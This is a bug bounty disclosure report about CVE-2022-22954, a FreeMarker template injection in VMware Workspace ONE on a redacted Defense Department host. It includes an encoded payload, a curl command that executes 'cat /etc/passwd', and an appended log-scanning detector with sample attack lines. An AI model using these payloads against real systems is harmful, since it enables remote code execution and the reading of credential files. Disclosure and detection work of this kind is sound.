HackerOne report H1:1537694 (Apr 11, 2022 - 4:41 p.m.)

U.S. Dept Of Defense: ███ vulnerable to CVE-2022-22954

2022-04-11 16:41:20 | fulldash | hackerone.com | 301

EPSS: 0.974 (High), Percentile: 99.9%

I found that one of the targets belonging to DOD is vulnerable to CVE-2022-22954, where an attacker may be able to execute any malicious code (like escalating). Remote code execution is also possible.

Technical Summary:

CVE-2022-22954 is a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager. It was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit it by sending a specially crafted request to a vulnerable Workspace ONE Access or Identity Manager instance; successful exploitation of the template injection results in remote code execution.

Vulnerable URL:

███=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Impact

The impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution and full control of the back-end server. Even without code execution, the attacker may be able to read sensitive data on the server.

System Host(s)

██████, ████

Affected Product(s) and Version(s)

VMware Workspace ONE

CVE Numbers

CVE-2022-22954

Steps to Reproduce

  • Run the following curl command

Command Used:

curl -sk -X GET -H "Host: ██████" "█████████=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d"

Response:

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/html">
    <head>
        <title>Error Page</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <link rel="stylesheet" type="text/css" href="/catalog-portal/css/errorpage.css">
    </head>

    <body>
        <div>
            <div>
                <img src="/catalog-portal/app/graphics/warning.svg">
            </div>
            <div>Request Failed</div>
            <div>
                <p>Please contact your IT Administrator.</p>
                <a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a>
            </div>
        </div>
    </body>
    <script>
        if(console && console.log) {
            console.log("auth.context.invalid");
            console.log("Authorization context is not valid. Login request  received with tenant code: uhhz-lbr-004v, device id: █████;
        }
    </script>
</html>
  • As you can see, the above response contains the output of /etc/passwd.
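From the defender's side, the report's payload has a recognisable shape once the query string is percent-decoded: a FreeMarker interpolation `${...}` that names a class under `freemarker.template.utility` or instantiates one with the `?new` built-in. The following is an added example, not part of the report, showing how that indicator can be hunted for in web server access logs. The log lines are constructed for the example, the request path `/catalog-portal/ui/example-endpoint` is a placeholder (the report redacts the real one), and only the parameter name `deviceUdid` and the encoded expression come from the report itself. It also goes slightly beyond the report by decoding repeatedly, so a value that was percent-encoded twice is still inspected in its final form.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not taken from the report.
# Line 2 carries the percent-encoded expression from the report's "Vulnerable URL";
# line 3 is the same kind of expression encoded twice; line 4 is a harmless ${...}.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Apr/2022:16:40:02 +0000] "GET /catalog-portal/ui/example-endpoint?error=&deviceUdid=7f3a-device HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Apr/2022:16:41:20 +0000] "GET /catalog-portal/ui/example-endpoint?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 400 1847',
    '10.0.0.9 - - [11/Apr/2022:16:41:31 +0000] "GET /catalog-portal/ui/example-endpoint?deviceUdid=%2524%257b%2522freemarker.template.utility.Execute%2522%253fnew()(%2522id%2522)%257d HTTP/1.1" 400 1847',
    '10.0.0.7 - - [11/Apr/2022:16:42:01 +0000] "GET /catalog-portal/ui/example-endpoint?ref=%24%7Bprice%7D HTTP/1.1" 200 2048',
    '10.0.0.7 - - [11/Apr/2022:16:42:03 +0000] "GET /catalog-portal/css/errorpage.css HTTP/1.1" 200 311',
]

# Combined log format: client, identity, user, [timestamp], "METHOD target PROTOCOL", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A FreeMarker interpolation, and the indicators that make one suspicious:
# a reference into freemarker.template.utility (Execute, ObjectConstructor, ...)
# or the ?new built-in, which instantiates an arbitrary class.
INTERPOLATION_RE = re.compile(r'\$\{[^}]*\}')
INDICATOR_RE = re.compile(r'freemarker\.template\.utility\.\w+|\?new\s*\(', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so a doubly
    encoded parameter is inspected as the server would eventually see it."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines):
    """Return one finding per query parameter whose decoded value contains a
    suspicious FreeMarker interpolation."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse; skip rather than guess
        parts = urlsplit(m.group("target"))
        # keep_blank_values so an empty error= does not hide later parameters;
        # parse_qsl removes one layer of encoding, fully_decode the rest.
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)
            for expr in INTERPOLATION_RE.findall(value):
                if INDICATOR_RE.search(expr):
                    findings.append({
                        "line": lineno,
                        "client": m.group("ip"),
                        "path": parts.path,
                        "param": name,
                        "expression": expr,
                        "status": int(m.group("status")),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} -> {f['path']} param {f['param']} "
              f"status {f['status']}: {f['expression']}")
```

Run against the constructed log, the scan reports lines 2 and 3 (parameter `deviceUdid`) and ignores the plain `${price}` on line 4, because it contains neither indicator. Note that the report's own response shows the server answering with an error page while still echoing the expression back, so a 4xx status is not evidence that the request was harmless; the decoded parameter value is what to alert on.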

Suggested Mitigation/Remediation Actions

Upgrade the affected instances to the latest version.